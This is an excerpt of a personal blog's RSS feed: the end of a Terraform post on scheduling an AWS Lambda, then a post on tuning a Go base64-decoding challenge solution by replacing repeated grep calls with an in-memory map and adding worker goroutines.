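&lt;p>For reference, the Terraform for such a schedule might look roughly like the sketch below. The resource and function names are my assumptions; a matching &lt;code>aws_lambda_permission&lt;/code> letting CloudWatch Events invoke the function would also be needed:&lt;/p>

```tf
# Hypothetical sketch of the 2-minute schedule; resource names are assumed.
resource "aws_cloudwatch_event_rule" "every_two_minutes" {
  name                = "invoke-lambda-every-2-minutes"
  schedule_expression = "rate(2 minutes)"
}

resource "aws_cloudwatch_event_target" "call_lambda" {
  rule  = aws_cloudwatch_event_rule.every_two_minutes.name
  arn   = aws_lambda_function.github_fetcher.arn
  input = jsonencode({ org_name = "twitter", target_bucket = "repos_folder" })
}
```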
&lt;h3 id="results">Results&lt;/h3>
&lt;p>In summary, it took me a while to get the hang of the Infrastructure as Code concept and apply it while working with Terraform on AWS, but I can definitely see how it benefits a bigger organisation that wants its cloud infrastructure to be stable and maintainable. IaC tools such as Terraform let developers define their infrastructure as code and check it in to version control for repeatable, more predictable deployments. Now that I have this working project, a simple &lt;code>terraform apply&lt;/code> brings my service to life in seconds, with all required components and permissions correctly set up, and I can just as quickly destroy it if I choose to. This flexibility and ease of development can speed up projects in the cloud considerably.&lt;/p></description></item><item><title>Performance tuning GO</title><link>https://flrnks.netlify.app/post/go-performance/</link><pubDate>Mon, 11 Nov 2019 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/go-performance/</guid><description>&lt;h3 id="introduction">Introduction&lt;/h3>
&lt;p>This post is a short story about how I managed to optimize the execution of a simple program, written for a coding challenge on the site &lt;code>runcode.ninja&lt;/code>.&lt;/p>
&lt;p>Short description of the task:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">There is a text file which is given as argument to your program.This text
file contains lines, each of which is an encoded englishword. Recover them
and print them out to the standard output lineby line. Hint: the UNIX
built-in dictionary may come in handy at &lt;span class="s2">&amp;#34;/usr/share/dict/american-english&amp;#34;&lt;/span>.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To attack the problem, I used the Go language and its built-in &lt;code>encoding&lt;/code> and &lt;code>os/exec&lt;/code> packages to decode the lines and to call grep to search the file-based dictionary. It was not very difficult to figure out that the encoding in use was base64.&lt;/p>
&lt;p>However, to make each line valid base64, either one or two &lt;code>=&lt;/code> padding characters had to be appended. The code below takes care of adding these extra characters at the end of each line:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="kd">func&lt;/span> &lt;span class="nf">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">encodedStr&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="kt">string&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">decoded&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">base64&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">StdEncoding&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">DecodeString&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">encodedStr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="kc">nil&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">encodedStr&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="s">&amp;#34;=&amp;#34;&lt;/span>
&lt;span class="nx">decoded&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nx">base64&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">StdEncoding&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">DecodeString&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">encodedStr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nb">string&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">decoded&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To test whether the result of a decode operation is a valid word, a helper function was written which takes a string argument and performs the call to grep via &lt;code>os/exec&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="kd">func&lt;/span> &lt;span class="nf">dictLookup&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">word&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="kt">bool&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">dictLocation&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="s">&amp;#34;/usr/share/dict/american-english&amp;#34;&lt;/span>
&lt;span class="nx">_&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">exec&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Command&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;grep&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;-w&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">word&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">dictLocation&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nf">Output&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="kc">nil&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="kc">false&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="kc">true&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, putting these pieces together, a function reads in the text file, iterates over the lines, and calls decode and the dictionary lookup until a valid word comes out, then prints it to standard output. Below is the sample code:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="nx">scanner&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">bufio&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">NewScanner&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">file&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">line&lt;/span> &lt;span class="kt">string&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Scan&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">line&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nf">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Text&lt;/span>&lt;span class="p">())&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">!(&lt;/span>&lt;span class="nf">dictLookup&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">line&lt;/span>&lt;span class="p">))&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">line&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nf">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">line&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nx">fmt&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Println&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">line&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="initial-results">Initial results&lt;/h3>
&lt;p>The sample code worked well enough, and running it on the provided sample data yielded correct output, so all seemed to be fine!&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">flrnks@t460:~/drop_the_bass &lt;span class="o">(&lt;/span>master&lt;span class="o">)&lt;/span> ▶ go run main.go input.txt
interpretation
sanctioned
lawn
electives
unifying
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Then came the idea to test this code on both of my laptops, because it did not seem to run very quickly even though it only had to decode 5 lines. One of my machines is a ThinkPad T460 with an i5 and 16GB of RAM, the other a 15&amp;rdquo; MacBook Pro with an i9 CPU and 32GB of RAM. I initially developed the code on the ThinkPad, and was quite surprised how much slower it executed on the MacBook. I would have expected the opposite, since the ThinkPad is already 3-4 years old and has a less powerful CPU. Initial test results from both machines:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash"> &lt;span class="o">[&lt;/span>MacBook&lt;span class="o">]&lt;/span> &lt;span class="o">[&lt;/span>ThinkPad&lt;span class="o">]&lt;/span>
interpretation 285.76ms 32.61ms
lawn 425.63ms 59.31ms
unifying 1.10s 93.60ms
electives 1.20s 91.10ms
sanctioned 6.18s 141.28ms
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Overall the MacBook took around 9 seconds on average to finish, while the ThinkPad took around 0.5 to 1 second. This was not normal, so I had to investigate! 👀 😄&lt;/p>
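&lt;p>The original measurement code is not shown, so as a reconstruction: one simple way to produce per-word timings like the ones above is to wrap each decode call with &lt;code>time.Since&lt;/code>:&lt;/p>

```go
package main

import (
	"encoding/base64"
	"fmt"
	"time"
)

// decode keeps appending '=' padding until the line becomes valid base64,
// mirroring the decode function from the post.
func decode(encodedStr string) string {
	decoded, err := base64.StdEncoding.DecodeString(encodedStr)
	for err != nil {
		encodedStr += "="
		decoded, err = base64.StdEncoding.DecodeString(encodedStr)
	}
	return string(decoded)
}

func main() {
	// time each decode individually, like the per-word numbers in the table
	for _, line := range []string{"bGF3bg", "dW5pZnlpbmc"} {
		start := time.Now()
		word := decode(line)
		fmt.Printf("%-16s %v\n", word, time.Since(start))
	}
}
```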
&lt;h3 id="performance-tuning-10">Performance Tuning 1.0&lt;/h3>
&lt;p>Seeing the results and the difference in performance, I was quite interested in what could cause such a performance drop on the MacBook. My first idea was to introduce concurrency into the processing: instead of reading lines sequentially, they are processed in parallel by being assigned via channels to a pool of workers, which return the results to the waiting main routine.&lt;/p>
&lt;p>&lt;img src="concurrent-go.png" alt="Go concurrency implemented">&lt;/p>
&lt;p>The figure above illustrates this concurrent processing model, and the snippet below shows its most important parts:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="c1">// define the channels for distributing work and collecting the results
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="nx">jobs&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nb">make&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">chan&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">results&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nb">make&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">chan&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">// use the waitgroup for syncing up between the workers
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="nx">wg&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nb">new&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">sync&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">WaitGroup&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">// start up some workers that will block and wait
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="nx">w&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">w&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">5&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">w&lt;/span>&lt;span class="o">++&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">wg&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">go&lt;/span> &lt;span class="nf">workerFunc&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">jobs&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">results&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">wg&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="c1">// interate over the file line by line and queue them up in the jobs channel
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">go&lt;/span> &lt;span class="kd">func&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">scanner&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">bufio&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">NewScanner&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">file&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Scan&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">jobs&lt;/span> &lt;span class="o">&amp;lt;-&lt;/span> &lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Text&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nb">close&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">jobs&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}()&lt;/span>
&lt;span class="c1">// In parallel routine wait for WG to finish and close channel for results
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">go&lt;/span> &lt;span class="kd">func&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">wg&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Wait&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="nb">close&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">results&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}()&lt;/span>
&lt;span class="c1">// Print out the results from the results channel.
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="nx">v&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="k">range&lt;/span> &lt;span class="nx">results&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">fmt&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Println&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">v&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This parallel processing noticeably improved the performance, but still did not eliminate the substantial difference between the two platforms.&lt;/p>
&lt;p>&lt;em>Note&lt;/em>: with the concurrent model the words appear on standard output in arbitrary order, so a submission to the grading system might fail.&lt;/p>
&lt;h3 id="performance-tuning-20">Performance Tuning 2.0&lt;/h3>
&lt;p>Next, while looking around on the internet (Stack Overflow in particular), I got the idea to stop calling grep via the &lt;code>os/exec&lt;/code> package and instead read the contents of the dictionary into memory and perform the lookups there, essentially trading memory footprint for speed. I created a global dictionary of type &lt;code>map[string]bool&lt;/code> which is loaded once at the start of the program and used as often as needed by the various goroutines. This is perfectly fine because the worker routines only perform read operations on the map, so there is no issue with concurrent access to the global variable.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="kd">var&lt;/span> &lt;span class="nx">wordDict&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nb">make&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">map&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="kt">string&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="kt">bool&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="kd">func&lt;/span> &lt;span class="nf">loadDictionary&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">dict&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">_&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">os&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;/usr/share/dict/american-english&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">defer&lt;/span> &lt;span class="nx">dict&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Close&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="nx">ds&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">bufio&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">NewScanner&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">dict&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">ds&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Scan&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">wordDict&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">ds&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Text&lt;/span>&lt;span class="p">()]&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="kc">true&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This way the dictionary lookups can no longer be bottlenecked by the I/O subsystem of the particular OS the program is running on. Executing the same timing test now yielded much improved results. It became clear that the issue on the MacBook was the slow execution of the external &lt;code>grep&lt;/code> call from the Go program. Why exactly, I am not sure, but the results speak for themselves:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash"> &lt;span class="o">[&lt;/span>MacBook&lt;span class="o">]&lt;/span> &lt;span class="o">[&lt;/span>ThinkPad&lt;span class="o">]&lt;/span>
interpretation 54.691µs 24.17µs
lawn 65.922µs 9.176µs
unifying 155.726µs 71.785µs
electives 113.074µs 47.478µs
sanctioned 286.94µs 464.20µs
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Somehow the older and less powerful ThinkPad still seems considerably faster, but at least the difference is no longer so substantial&amp;hellip; 😌&lt;/p>
&lt;h3 id="results">Results&lt;/h3>
&lt;p>The picture below summarizes the observed performance results, measured by execution time. To mitigate transient effects, 10 measurements were taken for each variant.&lt;/p>
&lt;p>&lt;img src="perf.png" alt="Performance measurements">&lt;/p>
&lt;p>Explanation for the different variants (Seq vs. Con and Grep vs Map):&lt;/p>
&lt;ul>
&lt;li>&lt;code>Seq&lt;/code>: each line is decoded one after the other in sequence.&lt;/li>
&lt;li>&lt;code>Con&lt;/code>: each line is processed concurrently on a pool of workers.&lt;/li>
&lt;li>&lt;code>Grep&lt;/code>: dictionary lookup done via an exec call to grep.&lt;/li>
&lt;li>&lt;code>Map&lt;/code>: dictionary is loaded into a string map in memory.&lt;/li>
&lt;/ul>
&lt;p>Quite frankly, the results speak for themselves. The most notable thing is that, compared to the most basic version (Seq-Grep), the biggest improvement is achieved not by using concurrency, but by eliminating the repeated calls to Grep.&lt;/p>
&lt;p>This is not to say that enabling concurrency had no impact on the execution time: on average it cut the runtime from 9 to 6 seconds, which is already quite good!&lt;/p>
&lt;p>However, at least at this input scale, I/O latency costs more performance than the lack of parallel processing does. The difference was less pronounced when the tests were run on a file with 500 lines of encoded words instead of just 5.&lt;/p>
&lt;h3 id="conclusion">Conclusion&lt;/h3>
&lt;p>Never underestimate the power of I/O delay and the effect it can have on your program: even on a very powerful machine it can bog your performance down considerably! And where possible, implementing proper concurrent processing can improve your program&amp;rsquo;s performance further.&lt;/p></description></item></channel></rss>